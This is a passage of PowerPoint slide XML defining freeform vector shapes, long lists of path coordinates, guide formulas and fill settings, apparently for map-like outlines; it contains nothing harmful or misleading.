                      <a:pt x="451" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="460" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="460" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="242"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36343" name="Freeform 75"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4133" y="1975"/>
                <a:ext cx="507" cy="243"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 443 w 507"/>
                  <a:gd name="T1" fmla="*/ 91 h 243"/>
                  <a:gd name="T2" fmla="*/ 445 w 507"/>
                  <a:gd name="T3" fmla="*/ 106 h 243"/>
                  <a:gd name="T4" fmla="*/ 463 w 507"/>
                  <a:gd name="T5" fmla="*/ 102 h 243"/>
                  <a:gd name="T6" fmla="*/ 480 w 507"/>
                  <a:gd name="T7" fmla="*/ 99 h 243"/>
                  <a:gd name="T8" fmla="*/ 503 w 507"/>
                  <a:gd name="T9" fmla="*/ 119 h 243"/>
                  <a:gd name="T10" fmla="*/ 504 w 507"/>
                  <a:gd name="T11" fmla="*/ 131 h 243"/>
                  <a:gd name="T12" fmla="*/ 483 w 507"/>
                  <a:gd name="T13" fmla="*/ 129 h 243"/>
                  <a:gd name="T14" fmla="*/ 464 w 507"/>
                  <a:gd name="T15" fmla="*/ 138 h 243"/>
                  <a:gd name="T16" fmla="*/ 452 w 507"/>
                  <a:gd name="T17" fmla="*/ 143 h 243"/>
                  <a:gd name="T18" fmla="*/ 441 w 507"/>
                  <a:gd name="T19" fmla="*/ 158 h 243"/>
                  <a:gd name="T20" fmla="*/ 425 w 507"/>
                  <a:gd name="T21" fmla="*/ 158 h 243"/>
                  <a:gd name="T22" fmla="*/ 399 w 507"/>
                  <a:gd name="T23" fmla="*/ 172 h 243"/>
                  <a:gd name="T24" fmla="*/ 382 w 507"/>
                  <a:gd name="T25" fmla="*/ 166 h 243"/>
                  <a:gd name="T26" fmla="*/ 374 w 507"/>
                  <a:gd name="T27" fmla="*/ 182 h 243"/>
                  <a:gd name="T28" fmla="*/ 381 w 507"/>
                  <a:gd name="T29" fmla="*/ 197 h 243"/>
                  <a:gd name="T30" fmla="*/ 357 w 507"/>
                  <a:gd name="T31" fmla="*/ 216 h 243"/>
                  <a:gd name="T32" fmla="*/ 330 w 507"/>
                  <a:gd name="T33" fmla="*/ 225 h 243"/>
                  <a:gd name="T34" fmla="*/ 295 w 507"/>
                  <a:gd name="T35" fmla="*/ 232 h 243"/>
                  <a:gd name="T36" fmla="*/ 273 w 507"/>
                  <a:gd name="T37" fmla="*/ 243 h 243"/>
                  <a:gd name="T38" fmla="*/ 260 w 507"/>
                  <a:gd name="T39" fmla="*/ 238 h 243"/>
                  <a:gd name="T40" fmla="*/ 230 w 507"/>
                  <a:gd name="T41" fmla="*/ 230 h 243"/>
                  <a:gd name="T42" fmla="*/ 200 w 507"/>
                  <a:gd name="T43" fmla="*/ 221 h 243"/>
                  <a:gd name="T44" fmla="*/ 159 w 507"/>
                  <a:gd name="T45" fmla="*/ 220 h 243"/>
                  <a:gd name="T46" fmla="*/ 129 w 507"/>
                  <a:gd name="T47" fmla="*/ 212 h 243"/>
                  <a:gd name="T48" fmla="*/ 106 w 507"/>
                  <a:gd name="T49" fmla="*/ 181 h 243"/>
                  <a:gd name="T50" fmla="*/ 78 w 507"/>
                  <a:gd name="T51" fmla="*/ 167 h 243"/>
                  <a:gd name="T52" fmla="*/ 47 w 507"/>
                  <a:gd name="T53" fmla="*/ 161 h 243"/>
                  <a:gd name="T54" fmla="*/ 48 w 507"/>
                  <a:gd name="T55" fmla="*/ 150 h 243"/>
                  <a:gd name="T56" fmla="*/ 50 w 507"/>
                  <a:gd name="T57" fmla="*/ 127 h 243"/>
                  <a:gd name="T58" fmla="*/ 31 w 507"/>
                  <a:gd name="T59" fmla="*/ 102 h 243"/>
                  <a:gd name="T60" fmla="*/ 6 w 507"/>
                  <a:gd name="T61" fmla="*/ 87 h 243"/>
                  <a:gd name="T62" fmla="*/ 0 w 507"/>
                  <a:gd name="T63" fmla="*/ 70 h 243"/>
                  <a:gd name="T64" fmla="*/ 21 w 507"/>
                  <a:gd name="T65" fmla="*/ 62 h 243"/>
                  <a:gd name="T66" fmla="*/ 38 w 507"/>
                  <a:gd name="T67" fmla="*/ 48 h 243"/>
                  <a:gd name="T68" fmla="*/ 68 w 507"/>
                  <a:gd name="T69" fmla="*/ 33 h 243"/>
                  <a:gd name="T70" fmla="*/ 101 w 507"/>
                  <a:gd name="T71" fmla="*/ 38 h 243"/>
                  <a:gd name="T72" fmla="*/ 124 w 507"/>
                  <a:gd name="T73" fmla="*/ 52 h 243"/>
                  <a:gd name="T74" fmla="*/ 144 w 507"/>
                  <a:gd name="T75" fmla="*/ 55 h 243"/>
                  <a:gd name="T76" fmla="*/ 160 w 507"/>
                  <a:gd name="T77" fmla="*/ 52 h 243"/>
                  <a:gd name="T78" fmla="*/ 162 w 507"/>
                  <a:gd name="T79" fmla="*/ 34 h 243"/>
                  <a:gd name="T80" fmla="*/ 176 w 507"/>
                  <a:gd name="T81" fmla="*/ 0 h 243"/>
                  <a:gd name="T82" fmla="*/ 209 w 507"/>
                  <a:gd name="T83" fmla="*/ 9 h 243"/>
                  <a:gd name="T84" fmla="*/ 227 w 507"/>
                  <a:gd name="T85" fmla="*/ 20 h 243"/>
                  <a:gd name="T86" fmla="*/ 235 w 507"/>
                  <a:gd name="T87" fmla="*/ 40 h 243"/>
                  <a:gd name="T88" fmla="*/ 275 w 507"/>
                  <a:gd name="T89" fmla="*/ 40 h 243"/>
                  <a:gd name="T90" fmla="*/ 308 w 507"/>
                  <a:gd name="T91" fmla="*/ 52 h 243"/>
                  <a:gd name="T92" fmla="*/ 336 w 507"/>
                  <a:gd name="T93" fmla="*/ 66 h 243"/>
                  <a:gd name="T94" fmla="*/ 366 w 507"/>
                  <a:gd name="T95" fmla="*/ 69 h 243"/>
                  <a:gd name="T96" fmla="*/ 391 w 507"/>
                  <a:gd name="T97" fmla="*/ 65 h 243"/>
                  <a:gd name="T98" fmla="*/ 408 w 507"/>
                  <a:gd name="T99" fmla="*/ 50 h 243"/>
                  <a:gd name="T100" fmla="*/ 428 w 507"/>
                  <a:gd name="T101" fmla="*/ 46 h 243"/>
                  <a:gd name="T102" fmla="*/ 451 w 507"/>
                  <a:gd name="T103" fmla="*/ 51 h 243"/>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507"/>
                  <a:gd name="T157" fmla="*/ 0 h 243"/>
                  <a:gd name="T158" fmla="*/ 507 w 507"/>
                  <a:gd name="T159" fmla="*/ 243 h 243"/>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507" h="243">
                    <a:moveTo>
                      <a:pt x="459" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="457" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="487" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="496" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="53"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36344" name="Freeform 76"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4133" y="1975"/>
                <a:ext cx="507" cy="243"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 443 w 507"/>
                  <a:gd name="T1" fmla="*/ 91 h 243"/>
                  <a:gd name="T2" fmla="*/ 445 w 507"/>
                  <a:gd name="T3" fmla="*/ 106 h 243"/>
                  <a:gd name="T4" fmla="*/ 463 w 507"/>
                  <a:gd name="T5" fmla="*/ 102 h 243"/>
                  <a:gd name="T6" fmla="*/ 480 w 507"/>
                  <a:gd name="T7" fmla="*/ 99 h 243"/>
                  <a:gd name="T8" fmla="*/ 503 w 507"/>
                  <a:gd name="T9" fmla="*/ 119 h 243"/>
                  <a:gd name="T10" fmla="*/ 504 w 507"/>
                  <a:gd name="T11" fmla="*/ 131 h 243"/>
                  <a:gd name="T12" fmla="*/ 483 w 507"/>
                  <a:gd name="T13" fmla="*/ 129 h 243"/>
                  <a:gd name="T14" fmla="*/ 464 w 507"/>
                  <a:gd name="T15" fmla="*/ 138 h 243"/>
                  <a:gd name="T16" fmla="*/ 452 w 507"/>
                  <a:gd name="T17" fmla="*/ 143 h 243"/>
                  <a:gd name="T18" fmla="*/ 441 w 507"/>
                  <a:gd name="T19" fmla="*/ 158 h 243"/>
                  <a:gd name="T20" fmla="*/ 425 w 507"/>
                  <a:gd name="T21" fmla="*/ 158 h 243"/>
                  <a:gd name="T22" fmla="*/ 399 w 507"/>
                  <a:gd name="T23" fmla="*/ 172 h 243"/>
                  <a:gd name="T24" fmla="*/ 382 w 507"/>
                  <a:gd name="T25" fmla="*/ 166 h 243"/>
                  <a:gd name="T26" fmla="*/ 374 w 507"/>
                  <a:gd name="T27" fmla="*/ 182 h 243"/>
                  <a:gd name="T28" fmla="*/ 381 w 507"/>
                  <a:gd name="T29" fmla="*/ 197 h 243"/>
                  <a:gd name="T30" fmla="*/ 357 w 507"/>
                  <a:gd name="T31" fmla="*/ 216 h 243"/>
